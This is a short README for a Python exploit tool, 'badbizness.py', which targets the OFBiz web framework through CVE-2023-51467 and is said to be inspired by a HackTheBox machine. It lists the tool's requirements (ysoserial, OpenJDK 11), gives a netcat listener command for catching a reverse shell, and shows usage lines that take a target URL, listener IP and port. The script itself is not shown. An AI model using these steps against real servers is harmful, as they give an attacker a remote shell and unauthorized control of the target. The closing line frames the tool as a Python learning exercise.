Automatic exploitation script for the Java web framework OF Biz under CVE-2023-51467. Inspired by the HackTheBox machine Bizness.
This script requires the tool ysoserial and OpenJDK version 11. See usage menu for installation.
Setup a listener to catch the shell with your preferred method. Here is a netcat example:
nc -nlvp 1337
Execute the script:
python3 badbizness.py [path to ysoserial-all.jar] [TARGET BASE URL] [LISTENER IP] [LISTENER PORT]
python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
This tool was meant as a way to learn more about Python. I credit this script for helping me thoroughly.